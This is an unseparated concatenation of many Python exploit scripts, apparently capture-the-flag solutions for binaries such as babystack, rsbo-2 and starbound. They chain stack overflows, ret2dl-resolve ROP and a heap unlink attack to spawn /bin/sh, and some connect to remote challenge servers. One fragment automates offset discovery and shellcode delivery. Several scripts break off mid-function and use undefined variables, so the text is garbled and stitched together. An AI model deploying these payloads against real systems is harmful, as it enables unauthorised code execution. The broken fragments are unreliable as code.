def pwn(ip=None,port=None):
binary='babystack'
io,libc,ru,rn,sl,sn=init(binary)
context.arch = 'i386'
context.log_level='debug'
elf = ELF(binary)
#p=cyclic(0x40)
#sn(p)
eip='laaa'
offset = cyclic_find(eip) #cyclic_find('baaacaaa', n=8)
info('offset',offset)
#ret2elf
leave_ret=0x8048455
bof=0x0804843b
arg_addr=elf.bss()
func_addr=arg_addr+20
p1='a'*offset+p32(elf.symbols['read'])+p32(bof)+p32(0)+p32(arg_addr)+p32(100)
info('p1 len',len(p1))
assert len(p1)==0x40
sn(p1)
# ret2dl
# save data to bss
rop = roputils.ROP(binary)
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(func_addr, 'system')
buf += rop.fill(100, buf)
sn(buf)
# call
p2='a'*offset+ rop.dl_resolve_call(func_addr, arg_addr)
sn(p2)
io.interactive()
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-04-14 20:59:16 # @Author : WinterSun ([email protected]) # @Link : https://Winter3un.github.io/ import roputils from pwn import * context(log_level="debug") DEBUG = 1 target = "./babyuse" remote_ip = "202.112.51.247" port = 3456 rop = roputils.ROP(target) # bss = rop.section('.bss') # rop.got('puts') # msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x0b\x0d\x0a' if DEBUG: p = process(target) # p = remote("127.0.0.1",54321) # gdb.attach(p,"b*main\nc") else: p = remote(remote_ip, port) def sl(data): p.sendline(data) def sd(data):
#!/usr/bin/env python
#coding:utf-8
#import sys
import roputils
from pwn import *
offset = 0x28 + 4 # buf -> ret_addr
readplt = 0x08048390 # read_addr
bss = 0x0804a020 # bss_addr
vulFunc = 0x0804852D # main
#p = process('./baby_pwn')
p = remote("da61f2425ce71e72c1ef02104c3bfb69.kr-lab.com", "33865")
rop = roputils.ROP('./baby_pwn')
addr_bss = rop.section('.bss')
# step1 : write sh & resolve struct to bss
buf1 = 'A' * offset #44
buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100)
p.send(buf1)
buf2 = rop.string('/bin/sh')
buf2 += rop.fill(20, buf2)
buf2 += rop.dl_resolve_data(addr_bss + 20,
'system') #在bss段伪造Elf32_Rel 和 Elf32_Sym
buf2 += rop.fill(100, buf2)
p.send(buf2)
buf3 = 'A' * 44 + rop.dl_resolve_call(addr_bss + 20,
addr_bss) #劫持eip至plt[0],解析system
import sys
import roputils
from pwn import *
#context.log_level = 'debug'
offset = 44
readplt = 0x08048390
bss = 0x0804a068
vulFunc = 0x0804852d
#p = process('./pwn')
#p = remote('da61f2425ce71e72c1ef02104c3bfb69.kr-lab.com','33865')
p = remote('39.106.224.151','60005')
rop = roputils.ROP('./pwn')
addr_bss = rop.section('.bss')
# step1 : write sh & resolve struct to bss
buf1 = 'A' * offset #44
buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100)
p.send(buf1)
buf2 = rop.string('/bin/sh')
buf2 += rop.fill(20, buf2)
buf2 += rop.dl_resolve_data(addr_bss+20, 'system')
buf2 += rop.fill(100, buf2)
p.send(buf2)
#gdb.attach(p)
#step2 : use dl_resolve_call get system & system('/bin/sh')
buf3 = 'A'*44 + rop.dl_resolve_call(addr_bss+20, addr_bss)
p.send(buf3)
p.interactive()
add(0, 512, "aaa")
add(1, 512, "aaa")
add(2, 512, "aaa")
add(3, 512, "/bin/sh\x00")
head = p64(0) + p64(1 + 512)
fd = p64(0x6020C0 - 0x18)
bk = p64(0x6020C0 - 0x10)
payload = head + fd + bk
payload += "a" * (512 - len(payload))
payload += p64(512) + p64(512 + 0x10)
payload += "a" * (600 - len(payload))
edit(0, 600, payload)
dele(1)
rop = roputils.ROP("./pwn2")
read_got = rop.got('read')
free_got = rop.got('free')
# free_got = 0x602018
edit_anyaddr(0x6020C0 + 0x20, p64(free_got))
show(4)
free_addr = u64(ru("\n")[:-1].ljust(8, "\x00"))
edit_anyaddr(0x6020C0 + 0x20, p64(read_got))
show(4)
read_addr = u64(ru("\n")[:-1].ljust(8, "\x00"))
print "free_addr=" + hex(free_addr)
print "read_addr=" + hex(read_addr)
offset = 0x83940 - 0x45390
HOST = "127.0.0.1"
PORT = 1234
ELF_PATH = "/home/davis/PWN/bata_24/r0pbaby/r0pbaby"
LIBC_PATH = "/home/davis/libc6_2.23-0ubuntu3_amd64.so"
# setting
context.arch = 'amd64'
context.os = 'linux'
context.endian = 'little'
context.word_size = 32
context.log_level = 'INFO'
elf = ELF(ELF_PATH)
libc = ELF(LIBC_PATH)
rop_libc = roputils.ROP(LIBC_PATH)
def message(info, addr):
print "[+] %s: [0x%x]" % (info, addr)
def get_number(msg, start, end, base):
return long(msg[start:end], base)
if __name__ == "__main__":
#r = remote(HOST, PORT)
r = process(ELF_PATH)
#coding:utf-8
#import sys
import roputils
from pwn import *
context.log_level = "debug"
elf = ELF("./runtime_dlresolve_64")
offset = 0x10 + 8
read_got = elf.plt["read"]
vulFunc = 0x0000000000400566
pop_rdi_ret = 0x0000000000400603
pop_rsir15_ret = 0x0000000000400601
p = process('./runtime_dlresolve_64')
rop = roputils.ROP('./runtime_dlresolve_64')
addr_stage = rop.section('.bss')
ptr_ret = rop.search(rop.section('.fini'))
# step1 : write sh & resolve struct to bss
buf = rop.fill(offset)
buf += p64(pop_rdi_ret) + p64(0) + p64(pop_rsir15_ret) + p64(addr_stage) + p64(
0) + p64(read_got) + p64(vulFunc)
p.send(buf)
buf = ""
buf += rop.dl_resolve_call(addr_stage + 210)
buf += rop.fill(210, buf)
buf += rop.dl_resolve_data(addr_stage + 210, 'system')
buf += rop.fill(310, buf)
buf += rop.string('/bin/sh')
buf += rop.fill(350, buf)
from pwn import *
import roputils
context.log_level = 'debug'
conn = remote('hackme.inndy.tw', 7706)
elf = ELF('./rsbo-2')
rop = roputils.ROP('./rsbo-2')
offset = 108
bss_addr = elf.bss()
base_stage = bss_addr + 0x800
pop_ebp = 0x0804879f
leave_ret = 0x080484f8
pop3_ret = 0x0804879d
main_addr = 0x0840867f
read_plt = elf.plt['read']
read_80b = 0x0804865c
payload = '\x00' * offset + p32(read_80b) + p32(pop_ebp) + p32(
bss_addr + 0x400) + p32(leave_ret)
conn.send(payload)
payload = 'a' * 4 + p32(read_plt) + p32(pop3_ret) + p32(0) + p32(
base_stage) + p32(100)
payload += rop.dl_resolve_call(base_stage + 20, base_stage)
payload += rop.fill(0x7f, payload)
conn.sendline(payload)
import roputils
from pwn import *
elf=ELF('./babystack')
sh=process('./babystack')
offset=0x28+4
bss_addr=elf.bss()
sub_addr=0x0804843B
read_addr=elf.plt['read']
#create another read
payload='A'*offset
payload+=p32(read_addr)+p32(sub_addr)+p32(0)+p32(bss_addr)+p32(100)
sh.send(payload)
#create REL & SYM in bss
rop=roputils.ROP('./babystack')
payload=rop.string("/bin/sh\x00")
payload+=rop.fill(20,payload)
payload+=rop.dl_resolve_data(bss_addr+20,'system')
payload+=rop.fill(100,payload)
sh.send(payload)
#rob eip to plt[0]
payload='A'*offset+rop.dl_resolve_call(bss_addr+20,bss_addr)
sh.send(payload)
sh.interactive()
from pwn import *
import roputils
import sys
context.arch = 'i386'
rop=roputils.ROP('./starbound')
host = 'chall.pwnable.tw'
port = 10202
if len(sys.argv) > 1:
r = remote(host, port)
else:
r = process('./starbound')
def back():
r.sendlineafter('> ', '1')
def setting():
r.sendlineafter('> ', '6')
def set_name(payload):
r.sendlineafter('> ', '2')
r.sendlineafter(': ', payload)
add_esp = 0x8048e48
puts_plt = 0x8048b90
read_plt = 0x8048a70
pop_ebp = 0x804a6df
pop_3_times = 0x804a6dd
linkmap_got = 0x8055004
# -*- coding: utf-8 -*-
from pwn import *
import sys
sys.path.append("/home/tree/pwntools/roputils")
import roputils
import time
#coding:utf-8
elf = ELF('./ret2dl32')
offset = 0x2c
read_plt = elf.plt['read']
bss = elf.bss
vulFunc = 0x0804840b #the vunlfunc address
p = process('./ret2dl32')
rop = roputils.ROP('./ret2dl32')
addr_bss = rop.section('.bss')
#step 1 write sh & resolve struct to addr_bss
payload = 'a' * 0x2c
payload += p32(read_plt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(0x100)
p.send(payload)
sleep(1)
payload = rop.string("/bin/sh\x00")
payload += rop.fill(20, payload)
payload += rop.dl_resolve_data(addr_bss + 20, 'system') #func, name
payload += rop.fill(100, payload)
p.send(payload)
sleep(1)
gdb.attach(p,cmd)
# gadget
pr = 0x080492d3 # pop ebp ; ret
pppr = 0x080492d1 # pop esi ; pop edi ; pop ebp ; ret
leave = 0x08049105 # leave ; ret
# info
read_plt = elf.symbols['read']
write_plt = elf.symbols['write']
stack_size = 0x800
bss_addr = elf.bss()
base_stage = bss_addr + stack_size
rop = roputils.ROP(local_file)
# rop1
offset = 112
payload = 'A'*offset
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(base_stage) + p32(100)
payload += p32(pr) + p32(base_stage+24) + p32(leave)
pl = rop.fill(offset)
pl += rop.call('read', 0, base_stage, 100)
pl += rop.dl_resolve_call(base_stage+20, base_stage)
ru('Welcome to XDCTF2015~!\n')
# sl(payload)
info_addr('base_stage', base_stage)
debug()
#存储栈上的数据
fake_stack_esp = bss_start + 0x200
#放置栈的位置有些要求,因为bss上面就是不可写的text段,所以为了防止程序移动esp到text段,需要向下放
#太往下会导致padding过多,导致我用的socat提示broken pipe
#Though this challenge is using https://github.com/giantbranch/pwn_deploy_chroot
fake_stack_ebp = fake_stack_esp + 0x250
#存储解析符号的结果
fake_resolve_start = bss_start + 0x300
print "bss_start:", hex(bss_start)
print "fake_stack_esp:", hex(fake_stack_esp)
print "fake_stack_ebp:", hex(fake_stack_ebp)
print "fake_resolve_start:", hex(fake_resolve_start)
rop = roputils.ROP("../pwn01")
#篡改栈指针,劫持栈:
payload = "A" * (0x16 - 0x8) + p32(fake_stack_esp +
4) + "BBBB" + p32(fake_stack_ebp)
#padding到fake栈的位置:
payload += "S" * (0x200 - len(payload))
#让main函数执行完后调用read函数,将数据写到fake_resolve_start,其中解析符号用的数据的位置为fake_resolve_start + 50
payload += rop.call('read', 0, fake_resolve_start, 100)
#执行完read函数后再去用刚写过去的解析符号用的数据来解析execve的位置
#并调用execve(fake_resolve_start+8, fake_resolve_start, 0)
#即execve("/bin/sh", 指向参数数组的指针, 指向环境数组的指针)
#这里参数无所谓,但必须要有,环境数组的指针为0. 具体为什么需要问出题人怎么魔改的/bin/sh文件
payload += rop.dl_resolve_call(fake_resolve_start + 50, fake_resolve_start + 8,
fake_resolve_start, 0)
#gdb.attach(session, '\n'.join(['b*0x080484ae', 'c', "b*0x08048519", "b*system"]))
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
import roputils as rp
context.log_level = "debug"
io = process("./bof")
offset = 112
rop = rp.ROP("./bof")
bss = rop.section(".bss")
payload = rop.fill(offset)
payload += rop.call('read', 0, bss, 100)
payload += rop.dl_resolve_call(bss + 20, bss)
io.sendlineafter("!\n", payload)
payload = rop.string("/bin/sh")
payload += rop.fill(20, payload)
payload += rop.dl_resolve_data(bss + 20, 'system')
payload += rop.fill(100, payload)
io.sendline(payload)
io.interactive()
io.close()
#!usr/bin/python
# -*- coding: utf-8 -*-
import roputils
from pwn import *
context(os='linux', log_level='debug')
offset = 44
readplt = 0x08048300
bss = 0x0804a020
ret = 0x0804843B
p = process('./stackba')
rop = roputils.ROP('./stackba')
addr_bss = rop.section('.bss')
buf1 = 'A' * offset #44
buf1 += p32(readplt) + p32(ret) + p32(0) + p32(addr_bss) + p32(100)
p.send(buf1)
buf2 = rop.string('/bin/sh')
buf2 += rop.fill(20, buf2)
buf2 += rop.dl_resolve_data(addr_bss + 20,
'system') #在bss段伪造Elf32_Rel 和 Elf32_Sym
buf2 += rop.fill(100, buf2)
p.send(buf2)
buf3 = 'A' * 44 + rop.dl_resolve_call(addr_bss + 20,
addr_bss) #劫持eip至plt[0],解析system
p.send(buf3)
p.interactive()
def getshell(self, binary):
global receive
#try:
if 1:
fpath = binary
core_list = filter(lambda x: "core" in x, os.listdir('.'))
if len(core_list) is not 0:
os.popen('ulimit -c unlimited')
for core in core_list:
os.unlink(core)
p = process(binary)
p.sendline(roputils.Pattern.create(2000))
sleep(0.5)
p.close()
'''
os.popen('ulimit -c unlimited')
p = process(fpath)
p.sendline(roputils.Pattern.create(2000))
'''
core_list = filter(lambda x: "core" in x, os.listdir('.'))
core = core_list[0]
p = roputils.Popen(
['gdb', fpath, core, '--batch', '-ex', 'x/wx $sp'],
stdin=PIPE,
stdout=PIPE)
data = p.stdout.readlines()
retaddr = data[len(data) - 1].split(':')[1].strip()
index = roputils.Pattern.offset(retaddr)
offset = int(index)
r = roputils.ROP(fpath)
target_elf = ELF(fpath)
sc = roputils.Shellcode('i386')
read_string = "\x65\x83\x3D\x0C\x00\x00\x00\x00\x75\x25\x53\x8B\x54\x24\x10\x8B\x4C\x24\x0C\x8B\x5C\x24\x08\xB8\x03\x00\x00\x00"
read_offset = list(target_elf.search(read_string))[0]
#print hex(read_offset)
target_elf = ELF(fpath)
buf_1 = r.retfill(offset)
#print len(buf_1)
addr_stage = r.section('.bss')
#print 'addr_stage',hex(addr_stage)
#print r.call(read_offset, 0, addr_stage, len(sc.exec_shell())),len(r.call(read_offset, 0, addr_stage, len(sc.exec_shell())))
buf_1 += r.call(read_offset, 0, addr_stage, len(sc.exec_shell()))
buf_1 += r.call(addr_stage)
buf_2 = sc.exec_shell()
#print 'shellcode ready'
#except:
# return -1
#try:
receive = str()
for i in range(2):
try:
p = process(r.fpath)
p.sendline(buf_1)
#print 'quick_mode : buf_1 send'
#print 'buf_1 : ',buf_1
#print len(buf_1)
p.recvn(1)
p.sendline(buf_2)
#print 'quick_mode : buf_2 send'
#print 'quick send'
#try:
p.sendline('echo zxcv;')
receive = p.recvuntil('zxcv\n')
p.close()
#print 'i:' + str(i) + 'p.close'
#try:
#print 'receive:',receive
except:
if i == 0:
p.close()
pass
#print 'i == 0,pass'
else:
p.close()
#print 'i == 1,return -1'
return -1
if 'zxcv' in receive:
break
if i == 0:
buf_1 = 'a' + '\x00' + buf_1[2:]
#print 'replace buf_1'
#print len(buf_1)
#p.close()
#print 'return payload'
return buf_1 + ',.,' + buf_2
